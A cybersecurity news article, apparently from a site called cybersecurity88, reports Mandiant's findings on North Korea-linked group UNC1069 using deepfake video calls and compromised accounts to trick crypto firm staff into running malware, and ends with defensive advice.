North Korea’s cyber operations are back in focus after new research exposed a group called UNC1069 targeting cryptocurrency companies. The findings were published by Mandiant, the threat intelligence division of Google Cloud. According to their report, this campaign is actively going after crypto exchanges and blockchain firms. The attackers are using artificial intelligence to make their scams more convincing.

Silhouette of a hooded hacker with North Korea flag background representing UNC1069 cyber operations against crypto companies.

What makes this operation different is the use of AI-generated deepfake technology. The attackers create realistic video impersonations of trusted executives or business partners. Victims are invited to what appears to be a normal company video meeting. Everything looks legitimate, including the invite and the person speaking on screen.

The attack usually starts with compromised internal accounts. Hackers gain access to an employee’s email or messaging platform and send meeting invitations from it. Because the invite comes from a genuine account, it does not raise suspicion. This increases the chances that the targeted employee will join the meeting.

Laptop displaying a malicious email with warning signs representing AI-powered phishing attacks targeting cryptocurrency exchanges.

Once inside the meeting, the attacker pretends there is a technical issue that needs urgent attention. The victim is asked to run specific commands on their computer to fix the problem. These commands are actually malicious and install hidden malware. The malware then opens backdoors or steals sensitive credentials.

Researchers confirmed that both Windows and macOS systems have been targeted. The malware is designed to collect login details, authentication tokens, and other valuable data. In crypto firms, this can include access to digital wallets or internal systems. The campaign appears to be financially motivated.

Digital Bitcoin symbol connected to a blockchain network illustrating crypto companies targeted in state-sponsored cyber attacks.

North Korean-linked cyber groups have long been associated with cryptocurrency theft. Digital assets are attractive because they can be moved quickly across borders. They are also harder to trace compared to traditional banking transfers. Targeting crypto companies directly increases the potential payout.

What makes this campaign dangerous is its heavy use of social engineering. Instead of exploiting software bugs, the attackers manipulate human trust. A realistic video call reduces doubt and creates urgency. Under pressure, employees may follow instructions without verifying them.

Illustration of multi-factor authentication showing password and biometric verification to prevent AI deepfake cyber attacks on crypto firms.

Security experts recommend verifying unexpected requests through a second communication channel. Companies should be cautious about running command-line instructions during unscheduled meetings. Multi-factor authentication and strong monitoring systems can help detect suspicious activity. As AI tools improve, organizations must stay alert and question even familiar faces on screen.

Stay alert, and keep your security measures updated!

Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news